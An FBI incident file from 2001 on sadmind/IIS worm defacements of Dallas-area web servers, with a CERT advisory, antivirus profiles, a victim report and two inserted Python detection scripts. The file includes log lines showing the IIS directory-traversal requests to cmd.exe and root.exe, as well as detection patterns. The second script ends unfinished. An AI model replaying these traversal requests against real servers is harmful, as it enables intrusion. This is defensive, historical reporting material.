FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date:05/22/2001 


To: Counterterrorism Attn: NIPC/CIOS/CIU
Chicago SA 


From: Dallas 
NIPC 


Approved By: 


Drafted By: 


Case ID #: 
(Pending)


Title: unknown subject; 
sadmind/IIS Worm victims; 
Web Defacements; 
5/22/2001 


SUBMISSION: INITIAL 
CASE OPENED: 05/22/2001 


CASE CLOSED: 05/22/2001 
Closed administratively 


COORDINATION:  FBI Field Office - Dallas, Chicago 
Government Agency - 
Private Corporation - 


b3 


b6


b7C 
b7E 


b3 
b6 
b7C 
b7E 




To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: American Hallmark Group/Hallmark Financial Services 


Address/location: 14651 Dallas Parkway #900 
Dallas, Texas 75240 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: Yes, firewall 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.hallmarkerp.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 202.107.11.78 (5/5/2001 at 4:00 am) 
CHINANET - China Telecom 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0 


b3 
b7E 


b6 
b7C 


To: Counterterrorism From: Dallas
Re: , Date 05/08/2001


VICTIM 
Company name/Government agency: [illegible] Inc.
Address/location: 4144 North Central Expressway, suite 


Dallas, Texas 75204 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Compaq (NT web server), Omni (Exchange mail server) 
Operating System: Windows NT 4.0 service pack 6A 
Software: IIS 4.0 


Security Features: 
Security Software Installed: Yes, Watchguard (hardware firewall), InoculateIT anti-virus 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.texastriathlon.com-victim 
If Internet: Network name: www.northtexasviperclub.com -victim
If Internet: Network name: www.hauk-i.com -victim 
If Internet: Network name: www.ljbb.com -victim 
If Internet: Network name: www.medica-inc.com -victim 
If Internet: Network name: www.mail.esinetwork.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion:
address: 208.177.103.98, XO Communications, Georgia ISP 
address: 211.136.17.141, Net Plus, Hong Kong ISP 
address: 202.241.213.160, C-Live, Japanese ISP 
address: 133.38.151.20, Sai Tama University, Japan 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 2 
Estimated dollar loss to date: $9,500, 38 man-hours to repair 
b3
b7E 


b7C 


To: Counterterrorism From: Dallas
Re: , Date 05/08/2001 b3


b7E 


VICTIM 


Company name/Government agency: Global Knowledge 
b6 


Address/location: 1057 South Sherman Street
b7C


Richardson, Texas 75081 


Purpose of System: web server for training organization 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Dell 8450 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.getglobalknowledge.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0, only 15 minutes down, restored files from backup 


To: Counterterrorism From: Dallas
Re: , Date 05/08/2001 


VICTIM 


Company name/Government agency: [illegible] Consulting Engineers, Inc.
Address/location: 2711 N. Haskell Ave., Cityplace
Dallas, Texas 75204 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.schmidt-stacy.com - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0 


b3 
b7E 


b7C 


To: Counterterrorism From: Dallas


Re: , Date 05/08/2001 b3
b7E 


VICTIM 


Company name/Government agency: The Pilcher's Group
b6
b7C 


Address/location: 7001 Preston Road, suite 200 
Dallas, Texas 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT, service pack 6.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.pilchers.com - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $150. for 6 man-hours to repair 


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: Northwest [illegible] School


Address/location: Denton, Texas 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Compaq 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.northwest.k12.tx.us - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: www.NJU.edu.cn/njue/profile/profile/president.htm 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $200, 8 man-hours to correct 


b3 
b7E 


b6 
b7C


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: Perry Equipment Corporation 


Address/location: Wolters Industrial Park 
Mineral Wells, Texas 76067 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Compaq 
Operating System: Windows NT 4.0
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection
If Internet: Network name: www.pecousa.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $125, 2 man-hours to repair 


b3 
b7E 


b7C 


To: Counterterrorism From: Dallas 
Re: , Date 05/08/2001


VICTIM 


Company name/Government agency: Rockwall Controls


Address/location: 306 E. Washington 
Rockwall, Texas 75087 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features:
Security Software Installed: Yes, ZoneAlarm 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.rockwallcontrols.com -victim 


Method:
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 202.103.134.218 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0, 2 man-hours to repair 


b3 
b7E 


b6 
b7C 


To: Counterterrorism From: Dallas
Re: , Date 05/08/2001


VICTIM 


Company name/Government agency: [redacted] individual


Address/location: [redacted]


Purpose of System: sells Herbalife 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Security Features: 
Security Software Installed: 
Logon Warning Banner: 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.EnergyTex.com - victim 
Network name: www.Reach4theSkve.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 
Estimated dollar loss to date: 


[redacted] hosts [redacted] site, has not contacted with more information.
To: Counterterrorism From: Dallas
Re: , Date 05/08/2001 b3


b7E 
VICTIM 
Company name/Government agency: Harris, Finley & Bogle 
b6 
b7C 


Address/location: 777 Main Street, suite 3600
Fort Worth, Texas 76102-5341 


Purpose of System: proxy server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 
Software: IIS 4.0 


Security Features: 
Security Software Installed: 
Logon Warning Banner: 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.hfblaw.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0 
Re: , Date 05/08/2001 b3


To: Counterterrorism From: Dallas 


b7E 
VICTIM 
Company name/Government agency: DSX Access Systems 
b6
Address/location: 10731 Rockwall
b7C


Dallas, Texas 75238 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Security Features:
Security Software Installed: Yes, firewall and packet filtering 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.dsxaccesssys.com - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: 
Estimated number of computers affected: 1 
Estimated dollar loss to date: 
b7E


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: Richmont 
b6 


Address/location: 17855 Dallas Parkway


Dallas, Texas 75240 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows 2000 
Software: IIS 5.0 


Security Features: 
Security Software Installed: Yes, firewall, IDS and packet filtering 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.richmont.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 146.153.1.15 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0, 1 man-hour to correct problem 
To: Counterterrorism From: Dallas
Re: , Date 05/08/2001 b3 
b7E 


Category of Crime:

Impairment:
[x] Malicious code inserted
[ ] Denial of service
[x] Destruction of information/software
[x] Modification of information/software

Intrusion:
[x] Unauthorized access
[ ] Exceeding authorized access

Theft of Information:
[ ] Classified information compromised
[ ] Unclassified information compromised
[ ] Passwords obtained
[ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained


REMARKS 


The victims listed above were attacked by the sadmind/IIS worm. All servers compromised had
Windows OS installed running IIS. All victims were told to retain their logs for future analysis.
According to the CERT Advisory CA-2001-11, a "victim" Solaris system has installed software to
attack Microsoft IIS web servers. All victims were made aware of the advisory since many did
not know they were infected by a worm. This information will be provided to case agent SA
[redacted] of the Chicago Field Office for further review.

Dollar value losses differ for each victim, due to the time it took to correct the problem. Many
experienced administrators fixed the problem in a short amount of time, while others spent days
researching the intrusion. No victim reported losing customers due to the defacement.


Top Screen

Protocol Attacks:
[ ] IP
[ ] TCP
[ ] UDP
[ ] FTP
[ ] TFTP
[ ] Telnet
[ ] r commands
[ ] SMTP
[ ] HTTP
[ ] gopher
[ ] X11 window
[ ] DNS
[ ] SNMP
[ ] FSP
[ ] NFS

Secondary Screen

Technology(s) Used (the form's per-protocol technique options; none checked):
spoofing attack
source routing
sequence number attack
spoofing attack
flooding
vulnerable version
SITE EXEC
overload FTP buffer
anonymous FTP
highjacking
packet sniffing
rsh
rlogin
vulnerable version
spoofing
embedded postscript attack
trojan horse attack
syslog attack
flooding
MIME
flooding
Telnet to HTTP port
vulnerable version
flooding

Other Attacks:
[x] Worm
[ ] Social engineering
[ ] Scavenging and reusing
[ ] Masquerading
[ ] Scanning
[ ] Trojan Horse
[ ] Other
Other Description:
CERT® Advisory CA-2001-11 sadmind/IIS Worm


Original release date: May 08, 2001 
Last revised: May 08, 2001 
Source: CERT/CC 


A complete revision history is at the end of this file. 
Systems Affected 


• Systems running unpatched versions of Microsoft IIS
• Systems running unpatched versions of Solaris up to, and including, Solaris 7


Overview 
The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the
sadmind/IIS worm). The worm uses two well-known vulnerabilities to compromise systems and deface web
pages.


I. Description


Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and subsequently
installs software to attack Microsoft IIS web servers. In addition, it includes a component to propagate itself 
automatically to other vulnerable Solaris systems. It will add "+ " to the .rhosts file in the root user's home 
directory. Finally, it will modify the index.html on the host Solaris system after compromising 2,000 IIS systems. 


To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in 
the Solstice sadmind program. For more information on this vulnerability, see 


http://www.kb.cert.org/vuls/id/28934
http://www.cert.org/advisories/CA-1999-16.html


After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the 
IIS systems. For additional information about this vulnerability, see 


http://www.kb.cert.org/vuls/id/111677 


Solaris Systems that are successfully compromised via the worm exhibit the following characteristics: 


• Sample syslog entry from compromised Solaris system

May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed

• A root shell listening on TCP port 600


http://www.cert.org/advisories/CA-2001-11.html 5/8/01 
• Existence of the directories
  o /dev/cub contains logs of compromised machines
  o /dev/cuc contains tools that the worm uses to operate and propagate

• Running processes of the scripts associated with the worm, such as the following:
  o /bin/sh /dev/cuc/sadmin.sh
  o /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
  o /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
  o /bin/sh /dev/cuc/uniattack.sh
  o /bin/sh /dev/cuc/time.sh
  o /usr/sbin/inetd -s /tmp/.f
  o /bin/sleep 300
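The syslog excerpt and the process list the advisory gives are two host-side signals a responder can match mechanically rather than by eye. The script below is an added example, not part of the CERT advisory or the FBI report: it counts the sadmind crash messages that inetd logs when the overflow is attempted (Bus Error, Segmentation Fault, Hangup, Killed) and checks a `ps` listing for the worm component names the advisory lists under /dev/cuc and the `inetd -s /tmp/.f` listener. The syslog and `ps` excerpts embedded in it are constructed to mirror the advisory's examples; the function names are this example's own.

```python
"""Added example (not from CERT CA-2001-11 or the FBI report): flag the
host-side traces the advisory lists for a Solaris box hit by the sadmind/IIS
worm, from syslog text and a `ps` listing. Sample inputs are constructed."""
import re
from collections import Counter

# Crash outcomes inetd reports for sadmind when the overflow is attempted.
SADMIND_CRASH = re.compile(
    r"inetd\[\d+\]: /usr/sbin/sadmind: (Bus Error|Segmentation Fault|Hangup|Killed)"
)
# Worm components named in the advisory's process list.
WORM_PROCESS_MARKERS = (
    "/dev/cuc/sadmin.sh", "/dev/cuc/grabbb", "/dev/cuc/uniattack.sh",
    "/dev/cuc/time.sh", "inetd -s /tmp/.f",
)

def sadmind_crash_events(syslog_text):
    """Return (total, counts_by_outcome) for sadmind crash lines logged by inetd."""
    counts = Counter()
    for line in syslog_text.splitlines():
        m = SADMIND_CRASH.search(line)
        if m:
            counts[m.group(1)] += 1
    return sum(counts.values()), dict(counts)

def worm_processes(ps_text):
    """Return the ps lines whose command matches a known worm component."""
    return [line.strip() for line in ps_text.splitlines()
            if any(marker in line for marker in WORM_PROCESS_MARKERS)]

def assess_solaris_host(syslog_text, ps_text, crash_threshold=2):
    """'infected' when worm processes run, 'attacked' when only the crash
    burst is present (exploit attempts that may have failed), else 'clean'."""
    crashes, by_outcome = sadmind_crash_events(syslog_text)
    procs = worm_processes(ps_text)
    if procs:
        verdict = "infected"
    elif crashes >= crash_threshold:
        verdict = "attacked"
    else:
        verdict = "clean"
    return {"verdict": verdict, "sadmind_crashes": crashes,
            "by_outcome": by_outcome, "worm_processes": procs}

# Constructed syslog excerpt modelled on the advisory's sample.
SAMPLE_SYSLOG = """\
May  7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May  7 02:40:01 carrier.domain.com last message repeated 1 time
May  7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May  7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May  7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed
May  7 02:45:00 carrier.domain.com sendmail[201]: alias database rebuilt
"""
# Constructed `ps -ef` excerpts: one infected host, one clean host.
SAMPLE_PS_INFECTED = """\
    root   139     1  0 02:00:00 ?  0:01 /usr/sbin/inetd -s
    root   812   139  0 02:41:10 ?  0:00 /bin/sh /dev/cuc/sadmin.sh
    root   815   812  0 02:41:11 ?  0:00 /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
    root   820     1  0 02:41:12 ?  0:00 /usr/sbin/inetd -s /tmp/.f
    root   830   812  0 02:41:13 ?  0:00 /bin/sleep 300
"""
SAMPLE_PS_CLEAN = """\
    root   139     1  0 02:00:00 ?  0:01 /usr/sbin/inetd -s
    root   200     1  0 02:00:01 ?  0:00 /usr/lib/sendmail -bd -q15m
"""

if __name__ == "__main__":
    print("infected host:", assess_solaris_host(SAMPLE_SYSLOG, SAMPLE_PS_INFECTED))
    print("clean ps, crash burst:", assess_solaris_host(SAMPLE_SYSLOG, SAMPLE_PS_CLEAN))
```

The crash burst alone is only evidence of attempts against sadmind, which is why it yields "attacked" rather than "infected"; a successful run of the worm shows up as the processes, and the sleep and the stock inetd line are deliberately not treated as indicators because they are normal on any host.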


Microsoft IIS servers that are successfully compromised exhibit the following characteristics: 


• Modified web pages that read as follows:


fuck USA Government 
fuck PoizonBOx 
contact:sysadmcn@yahoo.com.cn


• Sample Log from Attacked IIS Server

2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -


II. Impact


Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS
systems. IIS systems compromised by this worm can suffer modified web content.

Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on
vulnerable Solaris systems, and arbitrary commands with the privileges of the IUSR_machinename account on
vulnerable Windows systems.

We are receiving reports of other activity, including one report of files being destroyed on the compromised
Windows machine, rendering them unbootable. It is unclear at this time if this activity is directly related to this
worm.


III. Solutions


Apply a patch from your vendor
A patch is available from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

For IIS Version 4:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp


For IIS Version 5: 


http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
Additional advice on securing IIS web servers is available from

http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/tools.asp


Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191: 


http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba


Appendix A. Vendor Information 


Microsoft Corporation 


The following documents regarding this vulnerability are available from Microsoft: 
Sun Microsystems 
Sun has issued the following bulletin for this vulnerability:


http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba


References 


1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode
   in url (MS00-078) http://www.kb.cert.org/vuls/id/111677
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind
   http://www.cert.org/advisories/CA-1999-16.html


Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, John Shaffer
McAfee.com - Virus Information Library




Virus Profile 


SunOS/BoxPoison.worm is a Low risk Internet Worm 



Virus Name 
SunOS/BoxPoison.worm 
Date Added 

5/10/01 11:01:42 AM 


Virus Characteristics 

This worm requires an unpatched version of Solaris (version 7 or lower) in
order to spread. It uses the PERL/WSFT-Exploit trojan in order to attack 
unpatched Microsoft IIS Web Servers. It uses a buffer overflow exploit of the 
Sadmind program, a component of the Solstice AdminSuite. The worm 
opens port 600 and scans random IP addresses, looking for other systems 
to attack. 


For more information on this exploit, visit SUN Microsystems' website: SUN
Security Bulletin




Indications Of Infection 
- TCP port 600 being opened
- Presence of the directories 


/dev/cub 
/dev/cuc 


- Once 2000 systems have been attacked, all INDEX.HTML files on the host
system are overwritten to display the message:


f@#! USA Government 
f@#! PoizonBOx 
(substitute text has been used here for demonstration purposes) 


Method Of Infection
Infected machines scan random IP addresses looking for other systems to
infect. When one is found, a buffer overflow exploit is used to compromise
that computer which then propagates the virus as well.


http://vil.mcafee.com/dispVirus.asp?virus_k=99085& 


Removal instructions 
Use specified engine and DAT files for detection and removal. Delete any 
file which contains this detection. 


Windows ME Info: 

NOTE: Windows ME utilizes a backup utility that backs up selected files 
automatically to the C:\_Restore folder. This means that an infected file 
could be stored there as a backup file, and VirusScan will be unable to 
delete these files. These instructions explain how to remove the infected 
files from the C:\_Restore folder.


Disabling the Restore Utility 


1. Right click the My Computer icon on the Desktop.

2. Click on the Performance Tab.

3. Click on the File System button.

4. Click on the Troubleshooting Tab.

5. Put a check mark next to "Disable System Restore".

6. Click the Apply button.

7. Click the Close button.

8. Click the Close button again.

9. You will be prompted to restart the computer. Click Yes. 

NOTE: The Restore Utility will now be disabled. 

10. Restart the computer in Safe Mode. 

11. Run a scan with VirusScan to delete all infected files, or browse the
files located in the C:\_Restore folder and remove the files.

12. After removing the desired files, restart the computer normally. 

NOTE: To re-enable the Restore Utility, follow steps 1-9 and on step 5
remove the check mark next to "Disable System Restore". The infected files
are removed and the System Restore is once again active.




Virus Information 
Discovery Date: 5/9/01 
Origin: Unknown 
Length: Varies 
Type: Internet Worm 
SubType: Remote Access 
Risk Low 


Aliases 
Backdoor.Sadmind (NAV), Sadmin-iis (Panda), Solaris/Sadmind.worm,


Unix/Sadmind (Sophos) 


Sophos virus analysis: Unix/SadMind

Name: Unix/SadMind

Aliases: sadmind/IIS, Solaris/Sadmind.worm, Backdoor.Sadmind, SunOS/BoxPoison

Type: Unix worm

Detection: Will be detected by Sophos Anti-Virus July 2001 (3.47) or later. A virus identity (IDE) file is available for earlier versions from the Latest virus identities section.

Comments:

At the time of writing Sophos has not seen any infections
but has issued this alert due to media interest.

Unix/Sadmind is an internet worm which propagates using
a buffer overrun exploit on Solaris systems in the sadmind
program, part of the Solstice AdminSuite.

When the worm attacks a system it will append the text "+ +"
to the .rhosts file belonging to root. It will then copy the
worm (using rcp) to the new machine and extract into a
new /dev/cuc directory. /etc/rc.d/S71rpc will be changed so
the worm is started when the system is started and then
that file will be run to make the worm active immediately.


When the worm is active it will scan random class B 
networks looking for vulnerable machines to infect next. In 
parallel it will scan for Microsoft IIS web servers and will 
attempt to deface the front page with a message in red text 
on a black background stating 'fuck USA Government, fuck 
PoizonBOx. 


After the worm has infected 2000 other computers all 
index.html files on the infected machine will be changed to 


http://www.sophos.com/virusinfo/analyses/unixsadmind.html


5/16/01


From: NIPC-WATCH 


To: 
Date: 5/8/01 1: 
Subject: Cyber Intrusion Report 050801 007 41482 


The following information was provided: 


Subject: Cyber Incident Report Form 


Date: Mon, 7 May 2001 18:55:06 -0400 
From: [redacted]
To: «nipc.watc 1.gov> 


Report_date_time=May 7, 2001 6:00 p.m. cst 
Name 

Title=Network Administra 
Telephone Fax Numbe 


Organization=American Hallmark Group/Hallmark Financial Services
Addrs_Street=14651 Dallas Parkway #900
City=Dallas

State=Texas 

Zip Code=75240 

Country=USA 
Question1_Organization=SAME
Question1_Contact_Info 
Question1_Tele_Numbe 
Question1_Street=SAME 
Question1_City_State_Zipcd= 


Question1_Country=
Question2_Location=Server is in the locked computer "room" located in the company suite (#900). It requires code access to enter.

Question3_Date_Time=05/05/2001 4:00 am - 5/6/2001 @ 8:00 pm 
Question4_Critical=Yes 

Question5_crit_infrasture=Not Applicable

Question5_Remarks=No Remarks 

Question6_nature_of_prob=Intrusion 

Question6_nature_of_prob=System impairment/denial resources 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement 

Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 

Question8_method_of_attack=Vulnerability exploited
Question8_method_of_attack=Other

Question8_Remarks=It appears they came in through "port 80" and gained control of the cmd.exe to access the root directory. Then overwrote (or uploaded) their web pages over ours.
Question9_sus_perpetrators=Other

Question9_sus_perpetrators=Unknown

Question9_Remarks=Due to text on page, appears to be a hack group attacking the USA Government and another group called PoizonBOx. It has a contact of: sysadmen@yahoo.com.cn
Question10_ip_addrs=202.107.11.78

Question11_evid_of_spoof=Unknown

Question12_oper_systems=NT

Question12_Remarks=NT Vers 4. IIS ver.4

Question13_security_infrasture=Incident/Emergency Response Team


b6 
b7C 


b6 
b7C 


Question13_security_infrasture=Firewall

Question14_attack_loss_info=Unknown

Question14_Remarks=It appears they only replaced our main page with theirs, but we don't know if they collected data off the system too. If they did, it is hundreds of customers' auto insurance & claims details
Question15_damage_systms=No

Question15_Remarks=So far, all data and system seem intact other than the web pages
Question16_what_actions=System(s) disconnected from the network
Question16_what_actions=Backup of affected system(s)
Question16_what_actions=Log files examined

Question16_Remarks=Programmer intends to "flag" the drive as read-only and company has backed up all log files for later reference and is considering not allowing the programmer to work remotely any more
Question17_Field_Office=

Question17_fieldoff_inform=No

Question18_agency_inform=No

Question18_State_local_Police=

Question18_Inspector_General=

Question18_CERT-CC=

Question18_FedCIRC=

Question18_JTF-CND=

Question18_Other=

Question19_date_of_last_update=[illegible]

Question19_org_work_upd=[illegible] can get if needed

Question20_POC_Information=

Question20_sys_adm_contract=No

Share_Info_With=Infrastructure Orgs

Question21_remarks=Below is copy of a couple of lines from logfile:


2001-05-05 04:32:42 202.107.117.8 GET /scripts/../../winnt/system32/cmd.exe 200 80 - -
2001-05-05 04:32:42 202.107.117.8 GET /scripts/../../winnt/system32/cmd.exe 502 80 - -
2001-05-05 04:32:43 202.107.117.8 GET /scripts/root.exe 502 80 - -


b6 
b7C 
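The advisory's sample IIS log and the log lines the network administrator pasted into the report above show the same two request shapes in two different log layouts: a traversal out of /scripts to cmd.exe, and then a request for the copied root.exe. The script below is an added example, not part of the FBI report, the victim's submission or the CERT advisory: it pulls the request path out of each line without depending on column positions, so it reads both layouts, and flags traversal and requests for either command interpreter separately. The sample lines are the page's own (retyped with the OCR damage repaired) plus constructed lines using the 192.0.2.0/24 documentation range, one benign and one with a percent-encoded traversal; the function names are this example's own.

```python
"""Added example (not from the FBI report or CERT CA-2001-11): find the
sadmind/IIS worm's request pattern in IIS logs of either layout shown on
the page. Sample log is partly retyped from the page, partly constructed."""
import re
from collections import defaultdict
from urllib.parse import unquote

REQUEST = re.compile(r"\b(GET|POST|HEAD)\s+(\S+)")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SUSPECT_TARGETS = ("cmd.exe", "root.exe")

def classify_request(uri):
    """Return the reasons a request path looks like the worm's IIS activity."""
    # Percent-decode and fold backslashes so encoded or mixed separators
    # are judged on the path the server would actually resolve.
    decoded = unquote(uri).replace("\\", "/").lower()
    reasons = []
    if "/../" in decoded or decoded.endswith("/.."):
        reasons.append("directory traversal")
    # The final file name is checked on its own, so a traversal segment the
    # decoder cannot normalise still trips on cmd.exe / root.exe.
    if decoded.split("?", 1)[0].endswith(SUSPECT_TARGETS):
        reasons.append("command interpreter requested")
    return reasons

def scan_iis_log(text):
    """Yield one finding per suspicious line: client address, path, reasons.
    The client is the first IPv4 address before the method, which is the
    c-ip field in both layouts on the page."""
    findings = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        reasons = classify_request(m.group(2))
        if reasons:
            ips = IPV4.findall(line[:m.start()])
            findings.append({"client": ips[0] if ips else "unknown",
                             "uri": m.group(2), "reasons": reasons})
    return findings

def sources_by_hits(findings):
    """Count suspicious requests per client address (the 'Path of intrusion')."""
    counts = defaultdict(int)
    for f in findings:
        counts[f["client"]] += 1
    return dict(counts)

# Lines 1-3: advisory sample (W3C layout). Lines 4-5: victim's report layout.
# Lines 6-7: constructed; 192.0.2.x are documentation addresses.
SAMPLE_LOG = """\
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\\winnt\\system32\\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
2001-05-05 04:32:42 202.107.117.8 GET /scripts/../../winnt/system32/cmd.exe 200 80 - -
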